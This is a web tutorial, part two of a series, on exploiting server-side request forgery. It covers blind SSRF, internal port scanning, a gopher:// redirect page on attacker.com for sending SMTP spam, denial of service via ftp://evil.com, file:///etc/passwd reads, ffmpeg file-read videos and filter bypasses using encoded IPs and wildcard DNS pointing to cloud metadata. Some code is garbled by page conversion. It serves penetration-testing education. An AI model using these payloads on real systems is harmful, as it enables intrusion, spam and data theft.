Tutorials

SSRF – Server Side Request Forgery Types And Ways To Exploit It (Part-2)

byChandrakant Patil

January 27, 2019

Security Coding

We have discussed Basic SSRF in Part -1, now we will continue with its next part

ii. Blind –

Not all SSRF vulnerabilities return the response to the attacker. This type of SSRF is known as blind SSRF

Exploiting Blind SSRF –
DEMO (using Ruby)

require 'sinatra'
require 'open-uri'

get '/' do
open params[:url]
'done'
end

The above code runs a server on port 4567 which on getting request does the following:
> make request to URL mentioned by user
> send reponse “OK” back to user instead of content(CANT SEE RESPONSE)

http://localhost:4567/?url=https://google.com will request google.com but does not show the response from google to attacker

To demonstrate impact with this kind of SSRF is to run an Internal IP and PORT scan

Here’s a list of private IPv4 networks that you could scan for services:

```
10.0.0.0/8
```
```
127.0.0.1/32
```
```
172.16.0.0/12
```
```
192.168.0.0/16
```

We can determine whether the specified PORT is Open/Closed by observing the Response Status and Response Time

Below is the example table of response status and time.

Send Spam mails –

In some case if the server supports Gopher we use it to send spam mails from server IP

To demonstrate we will use test.smtp.org testing server.

Let’s craft a malicious php page :

http://attacker.com/ssrf/gopher.php

',
'RCPT TO: ',
'DATA',
'Test mail',
'.'
);
$payload = implode('%0A', $commands);
header('Location: gopher://test.smtp.org:25/_'.$payload);
?>

https://example.com/ssrf.php?url=http://attacker.com/ssrf/gopher.php

This code concats our SMTP command into one line delimited by %0A and forces server to send a ‘GOPHER’ request to a SMTP server while actually sending a valid SMTP request

Performing Denial of service –

An attacker can use iptables TARPIT target to block requests for a prolonged time and CURL’s FTP:// protocol which never timeouts.

An attacker can send all TCP traffic to port 12345 to TARPIT and the request

https://example.com/ssrf/url?url=ftp://evil.com:12345/TEST

Test Cases –
Places to look for SSRF

End points which fetch external/internal resources –
Case I-

http://example.com/index.php?page=about.php

http://example.com/index.php?page=https://google.com

http://example.com/index.php?page=file:///etc/passwd

Refer – Link

Case -II

Try changing urls in POST request

POST /test/demo_form.php HTTP/1.1
Host: example.com
url=https://example.com/as&name2=value2

Refer – #411865, Link

PDF generators –

There are some cases where server converts uploaded file to a pdf

Try injecting , <img>, <base> or <script> elements or CSS url() functions pointing to internal services.</p> <p>You can read internal files using this</p> <pre><iframe src=”file:///etc/passwd” width=”400" height=”400"> <iframe src=”file:///c:/windows/win.ini” width=”400" height=”400"></pre> <p>Refer – <a href="https://www.noob.ninja/2017/11/local-file-read-via-xss-in-dynamically.html" target="_blank" rel="noopener noreferrer">Link</a></p> <pre>File uploads - Instead of uploading try changing input type to URL and check if the server sends a request to it <input type=”file” id=”upload_file” name=”upload_file[]” class=”file” size=”1" multiple=””> to <input type=”url” id=”upload_file” name=”upload_file[]” class=”file” size=”1" multiple=””> and Pass the URL</pre> <p>Here’s an <a href="https://hackerone.com/reports/713" target="_blank" rel="noopener noreferrer">example</a>.</p> <h3>Video Conversion –</h3> <p>There are many applications using outdated version ffmpeg to convert videos from one format to other</p> <p>There is know SSRF vulnerability in this</p> <p>Clone <a href="https://github.com/neex/ffmpeg-avi-m3u-xbin" target="_blank" rel="noopener noreferrer">neex repo</a> and generate an avi using below command</p> <pre>./gen_xbin_avi.py file://<filename> file_read.avi</pre> <p>and upload it in the vulnerable server and try converting it from avi to mp4</p> <p>this reads can be used to read internal file and write in to the video</p> <p>Refer – <a href="https://hackerone.com/reports/237381" target="_blank" rel="noopener noreferrer">#237381</a> , <a href="https://hackerone.com/reports/226756" target="_blank" rel="noopener noreferrer">#226756</a></p> <h3>Know SSRF vulnerabilities in CMS ,Plugins, Themes.</h3> <p>This is limited to your search knowledge</p> <pre><em>CVE - Search Results</em> <em>Common Vulnerabilities and Exposures (CVE®) is a list of entries - each containing an identification number, a…</em> <em>cve.mitre.org </em> <em>Search</em> <em>WordPress Vulnerability Search</em> <em>wpvulndb.com </em></pre> <h3>3. Bypass Whitelisting and Blacklisting –</h3> <p>Lets talk about whitelisting and blacklisting first</p> <p><strong><em>whitelisting –</em></strong> Allowing specific URL’s (Allowed Hosts)</p> <p>Lets say if a server whitelist google.com and u can fetch only google.com using SSRF and rest all other domains get rejected</p> <p>The only way to bypass whitelisting is find an open redirect in the whitelisted domain. Lets look in to example</p> <p><strong>Case – 1</strong></p> <pre>www.example.com whitelisted abc.com and you found SSRF in example.com http://example.com/ssrf.php?url=https://google.com -Fails to fetch as it is not whitelisted http://example.com/ssrf.php?url=http://abc.com/?redirect=https://google.com - Successfully fetches google.com</pre> <p><strong>Case – 2</strong></p> <p>www.example.com whitelisted *.abc.com and you found SSRF in example.com</p> <p>http://example.com/ssrf.php?url=https://google.com -Fails to fetch as it is not whitelisted</p> <p>This can be bypassed if you get any subdomain takeover on *.abc.com</p> <p>and use it to iframe or redirect it to desired site</p> <pre>http://example.com/ssrf.php?url=http://subdomain.abc.com/?redirect=https://google.com — Successfully fetches google.com</pre> <p><strong><em>blacklisting –</em></strong> Blocking specific URL’s (Disallowed Hosts)</p> <p>In the same way if a server blacklist google.com and when you ask the server to fetch google.com it blocks</p> <p>Blacklisting can be bypassed in many ways</p> <h3>Converting IP to hexadecimal –</h3> <p>example – converting http://192.168.0.1 to doted hex – http://c0.a8.00.01 and dot less hex http://0xc0a80001</p> <h3>Converting IP to Decimal –</h3> <p>Use any online convertors ( Link )</p> <pre>http://0177.0.0.1/ = http://127.0.0.1 http://2130706433/ = http://127.0.0.1 http://3232235521/ = http://192.168.0.1 http://3232235777/ = http://192.168.1.1</pre> <h3>Converting IP to Octal –</h3> <p>example — converting http://192.168.0.1 to doted octal http://0300.0250.0000.0001 and dot less http://030052000001</p> <p>Refer – <a href="https://hackerone.com/reports/288250" target="_blank" rel="noopener noreferrer">#288250</a></p> <h3>Using wildcard DNS –</h3> <p>There are many sites online provide wildcard DNS, some of them are</p> <p><strong><em>xip.io: wildcard DNS for everyone</em></strong></p> <p><em>What is xip.io? xip.io is a magic domain name that provides wildcard DNS for any IP address. Say your LAN IP address…</em><br /> <em>xip.io </em></p> <p><strong><em>NIP.IO – wildcard DNS for any IP Address</em></strong></p> <p><em>NIP.IO allows you to map any IP Address in the following DNS wildcard entries:</em><br /> <em>nip.io </em></p> <p><strong><em>ip6.name</em></strong></p> <p>The DNS server of ip6.name serves AAAA records for every IPv6 address in existence. Think xip.io, but for IPv6.<br /> ip6.name</p> <p><strong><em>Welcome to sslip.io</em></strong></p> <p>sslip.iosslip.io</p> <p>You can simply use them to point it to a specific IP</p> <pre>10.0.0.1.xip.io resolves to 10.0.0.1 www.10.0.0.1.xip.io resolves to 10.0.0.1 mysite.10.0.0.1.xip.io resolves to 10.0.0.1 foo.bar.10.0.0.1.xip.io resolves to 10.0.0.1 ssrf-cloud.localdomain.pw resolves to 169.254.169.254 metadata.nicob.net resolves to 169.254.169.254</pre> <p>Or you can use your own domain to do this</p> <p>Make a subdomain and point to 192.168.0.1 with DNS A record</p> <p>Refer:- <a href="https://hackerone.com/reports/288193" target="_blank" rel="noopener noreferrer">#288193</a> , <a href="https://hackerone.com/reports/288183" target="_blank" rel="noopener noreferrer">#288183</a></p> <h3>Using enclosed alphanumerics –</h3> <pre>http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ = example.com List: ① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿</pre> <p><strong>End of Part -2</strong></p> <pre><strong><em>About The Author</em></strong> <em>Santhosh Kumar, he is an experienced Security Researcher with a demonstrated history of working in the computer and network security industry. Strong information technology professional skilled in Penetration Testing, Cryptography, Application Security, Web Application Security, and Ethical Hacking.</em></pre> <p> </p> </div> <div class="cs-entry__comments cs-entry-comments-simple" id="comments"> <div id="respond" class="comment-respond"> <h5 class="cs-section-heading cs-section-heading-common is-style-cnvs-block-section-heading-default halignleft ">Leave a Reply <small><a rel="nofollow" id="cancel-comment-reply-link" href="/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-2/#respond" style="display:none;">Cancel reply</a></small></h5><p class="must-log-in">You must be <a href="https://hackersonlineclub.com/wp-login.php?redirect_to=https%3A%2F%2Fhackersonlineclub.com%2Fssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-2%2F">logged in</a> to post a comment.</p> </div> </div> <div class="cs-entry__prev-next cs-entry__prev-next-type-2"> <div class="cs-entry__prev-next-item cs-entry__prev"> <a class="cs-entry__prev-next-link" href="https://hackersonlineclub.com/how-to-protect-your-dedicated-server-against-the-attacks/"></a> <div class="cs-entry__prev-next-label"> <span class="cs-entry__prev-next-arrow"> <i class="cs-icon cs-icon-chevron-left"></i> </span> <span class="cs-entry__prev-next-text"> Previous Article </span> </div> <div class="cs-entry"> <div class="cs-entry__outer"> <div class="cs-entry__thumbnail cs-entry__inner cs-overlay-ratio cs-ratio-original"> <div class="cs-overlay-background cs-overlay-transparent"> <img width="110" height="110" src="https://hackersonlineclub.com/wp-content/uploads/2019/01/Dedicater-Server-Protection-110x110.png" class="attachment-csco-small size-csco-small wp-post-image" alt="Dedicated Server Protection" decoding="async" srcset="https://hackersonlineclub.com/wp-content/uploads/2019/01/Dedicater-Server-Protection-110x110.png 110w, https://hackersonlineclub.com/wp-content/uploads/2019/01/Dedicater-Server-Protection-150x150.png 150w, https://hackersonlineclub.com/wp-content/uploads/2019/01/Dedicater-Server-Protection-80x80.png 80w" sizes="(max-width: 110px) 100vw, 110px" /> </div> </div> <div class="cs-entry__inner cs-entry__content "> <h2 class="cs-entry__title cs-entry__title-line"> <span>How to Protect Your Dedicated Server Against The Attacks?</span> </h2> <div class="cs-entry__post-meta" ><div class="cs-meta-author"><a class="cs-meta-author-inner url fn n" href="https://hackersonlineclub.com/author/hocit/" title="View all posts by Priyanshu Sahay"><span class="cs-by">by</span><span class="cs-author">Priyanshu Sahay</span></a></div></div> </div> </div> </div> </div> <div class="cs-entry__prev-next-item cs-entry__next"> <a class="cs-entry__prev-next-link" href="https://hackersonlineclub.com/cisco-routers-hacked-by-using-new-exploit/"></a> <div class="cs-entry__prev-next-label"> <span class="cs-entry__prev-next-arrow"> <i class="cs-icon cs-icon-chevron-left"></i> </span> <span class="cs-entry__prev-next-text"> Next Article </span> </div> <div class="cs-entry"> <div class="cs-entry__outer"> <div class="cs-entry__thumbnail cs-entry__inner cs-overlay-ratio cs-ratio-original"> <div class="cs-overlay-background cs-overlay-transparent"> <img width="110" height="110" src="https://hackersonlineclub.com/wp-content/uploads/2019/01/CISCO-1-110x110.png" class="attachment-csco-small size-csco-small wp-post-image" alt="CISCO Routers" decoding="async" srcset="https://hackersonlineclub.com/wp-content/uploads/2019/01/CISCO-1-110x110.png 110w, https://hackersonlineclub.com/wp-content/uploads/2019/01/CISCO-1-150x150.png 150w, https://hackersonlineclub.com/wp-content/uploads/2019/01/CISCO-1-80x80.png 80w" sizes="(max-width: 110px) 100vw, 110px" /> </div> </div> <div class="cs-entry__inner cs-entry__content "> <h2 class="cs-entry__title cs-entry__title-line"> <span>Cisco Routers Hacked By Using New Exploit</span> </h2> <div class="cs-entry__post-meta" ><div class="cs-meta-author"><a class="cs-meta-author-inner url fn n" href="https://hackersonlineclub.com/author/hocit/" title="View all posts by Priyanshu Sahay"><span class="cs-by">by</span><span class="cs-author">Priyanshu Sahay</span></a></div></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <aside id="secondary" class="cs-sidebar__area cs-widget-area"> <div class="cs-sidebar__inner"> <div class="widget block-15 widget_block"> <hr class="wp-block-separator has-alpha-channel-opacity"/> </div><div class="widget block-5 widget_block"> <figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper"> <iframe title="AI Cyber Security #Podcast -2 | Google SAIF" width="1200" height="675" src="https://www.youtube.com/embed/dQ8CVoynYzk?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen>

Burp Suite Payload Processing Rules - Examples

The Latest

Udemy Data Breach – 1.4 Million Records Leaked by ShinyHunters

7 Best AI Red Teaming Platforms For 2026

The Hidden Threat: How Third-Party Vulnerabilities Affect Platforms Like OpenAI

Google Uncovers “DarkSword”: Advance iOS Exploit Chain Targeting Users

SSRF – Server Side Request Forgery Types And Ways To Exploit It (Part-2)

ii. Blind –

Send Spam mails –

Performing Denial of service –

PDF generators –

Article Of The Week

DeepSeek Database Exposed with 1 Million Log Enteries

SSRF – Server Side Request Forgery Types And Ways To Exploit It (Part-2)

ii. Blind –

Send Spam mails –

Performing Denial of service –

PDF generators –

Article Of The Week

DeepSeek Database Exposed with 1 Million Log Enteries

Related Posts